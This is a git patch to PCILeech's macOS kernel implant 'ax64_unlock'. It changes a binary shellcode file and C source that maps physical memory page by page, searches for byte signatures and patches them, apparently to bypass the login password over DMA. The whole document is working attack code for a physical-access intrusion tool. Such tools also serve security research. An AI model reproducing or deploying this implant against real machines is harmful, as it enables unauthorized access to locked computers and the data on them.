From 30da690e6a05aa0606cbc34f414a29bdb2a40fac Mon Sep 17 00:00:00 2001 From: ufrisk Date: Sat, 3 Sep 2016 00:07:17 +0200 Subject: [PATCH] implant: minor fixes [ax64_unlock] --- pcileech_files/ax64_unlock.ksh | Bin 1949 -> 1933 bytes pcileech_shellcode/ax64_common.h | 3 ++ pcileech_shellcode/ax64_unlock.c | 46 +++++++++++++++---------------- 3 files changed, 25 insertions(+), 24 deletions(-) diff --git a/pcileech_files/ax64_unlock.ksh b/pcileech_files/ax64_unlock.ksh index 888c6cb258db2a5d054713191a765b43d6c0f13e..7980c7fe0fc44ac73a8aa0d6ffe5b44c0dfa93a4 100644 GIT binary patch delta 638 zcmZ8eOK1~O6rD*Xt<=^;MNtYe>ImIgh?sy1dDOri97?376_VD4rMOTRX(ED!Sf)YK z%P1u)5%+>Ct+a_q3`F9uv;jY{sJQSq)u=6~wMg^4FLCADJl;9yo^$Vg*W8x-fNx`U zf2{9J$H(FMh_!Oso@%}wdGe>DwBeKTVWD=pS~=zFmZiqI>T2A3H#P3T3AS@0q^#=& z`~l|sMKG(Xef(z3C+|MO!mO9|0aghNc?%DMd?5>Eb7i8<$dh&LbSWdu(v#2M@=K__G!w!}cGgEXK@P+Ui zq9;WwDIRy-6C8||M4@h0<-`pbEfOT_``*OHbiCxD;aIj#W5qsO<9zvTdtte}tBLwH ztf&^!G2+*8IH2P>(D5BR#s-+HpGEtNnQcmY()$bWGwmvvdK6FU)=>w;m2u}-A%4O= z-BUBHE}2sNlmgD@2i;Q-ZNAF6*c*&@wUSIFSqsV9{*%4@C)-Z^X5zO}@u4kbLb?Fi z+0!J*%ZJ5$W>Ew4yPUWP7}Ywl1Q^!>fG0IS;D`ob-dEW`ab_maBfcHXoJwnv0p}AQ j`#RZR0n(;Q`~1?HRWfZ#*s*qXa!}bL%a13oxD>}4hMo~fV)FfUkMBPSd zA1jm`B8Z3=FP@}g(g zYp*RFkSUyD#kGWv=MUlZ!dcA56(! zZ2eMP>*M$q@R|ld35NhDv~ys-R{1C&;qgkXR_hxU6M{J>-k1S?N(Y?#chunk[0].cb || SysVCall(pk->fn.memcmp, pb + ps->chunk[0].cbOffset, ps->chunk[0].pb, (QWORD)ps->chunk[0].cb)) { - continue; - } - if(ps->chunk[1].cb && SysVCall(pk->fn.memcmp, pb + ps->chunk[1].cbOffset, ps->chunk[1].pb, (QWORD)ps->chunk[1].cb)) { - continue; - } - SysVCall(pk->fn.memcpy, pb + ps->chunk[2].cbOffset, ps->chunk[2].pb, (QWORD)ps->chunk[2].cb); - result = TRUE; + for(i = 0; i < cSignatures; i++) { + ps = pSignatures + i; + if(!ps->chunk[0].cb || SysVCall(pk->fn.memcmp, pbPage + ps->chunk[0].cbOffset, ps->chunk[0].pb, (QWORD)ps->chunk[0].cb)) { + continue; } + if(ps->chunk[1].cb && SysVCall(pk->fn.memcmp, pbPage + ps->chunk[1].cbOffset, ps->chunk[1].pb, (QWORD)ps->chunk[1].cb)) { + continue; + } + SysVCall(pk->fn.memcpy, pbPage + ps->chunk[2].cbOffset, ps->chunk[2].pb, (QWORD)ps->chunk[2].cb); + result = TRUE; } return result; } @@ -63,26 +59,28 @@ STATUS Unlock(PKMDDATA pk) }, }; PBYTE pbMemoryMap; - QWORD cbMemoryMap, qwBaseAddress, qwMemoryAddressMax; + QWORD cbMemoryMap, qwBaseAddress, qwMemoryAddressMax, o; BOOL result = FALSE; // 1: Retrieve physical memory map pbMemoryMap = (PBYTE)SysVCall(pk->fn.IOMalloc, 4096); if(!pbMemoryMap) { - return STATUS_FAIL_BASE | 2; + return STATUS_FAIL_OUTOFMEMORY; } if(!GetMemoryMap(pk, pbMemoryMap, &cbMemoryMap)) { - return STATUS_FAIL_BASE | 3; + return STATUS_FAIL_MEMORYMAP_NOT_FOUND; } qwMemoryAddressMax = GetMemoryPhysicalMaxAddress(pbMemoryMap, cbMemoryMap); // 2: Search for the memory signature and patch it. - for(qwBaseAddress = 0; qwBaseAddress < qwMemoryAddressMax; qwBaseAddress += 0x100000) { - if(IsRangeInPhysicalMap(pbMemoryMap, cbMemoryMap, qwBaseAddress, 0x100000)) { - MapMemoryPhysical(pk, qwBaseAddress); - result = Unlock_FindAndPatch(pk, (PBYTE)VM_MIN_PHYSICALMAPPING_ADDRESS, 0x100, oSigs, NUMBER_OF_SIGNATURES) || result; + for(qwBaseAddress = 0; qwBaseAddress < qwMemoryAddressMax; qwBaseAddress += 0x01000000) { + MapMemoryPhysical(pk, qwBaseAddress); + for(o = 0; o < 0x01000000; o += 0x1000) { + if(IsRangeInPhysicalMap(pbMemoryMap, cbMemoryMap, qwBaseAddress + o, 0x1000)) { + result = Unlock_FindAndPatch(pk, (PBYTE)(VM_MIN_PHYSICALMAPPING_ADDRESS + o), oSigs, NUMBER_OF_SIGNATURES) || result; + } } } SysVCall(pk->fn.IOFree, pbMemoryMap, 4096); - return result ? STATUS_SUCCESS : STATUS_FAIL_BASE | 4; + return result ? STATUS_SUCCESS : STATUS_FAIL_SIGNATURE_NOT_FOUND; } VOID c_EntryPoint(PKMDDATA pk) @@ -90,6 +88,6 @@ VOID c_EntryPoint(PKMDDATA pk) if(pk->dataIn[0] == 1) { pk->dataOut[0] = Unlock(pk); } else { - pk->dataOut[0] = STATUS_FAIL_BASE | 1; + pk->dataOut[0] = STATUS_FAIL_INPPARAMS_BAD; } } \ No newline at end of file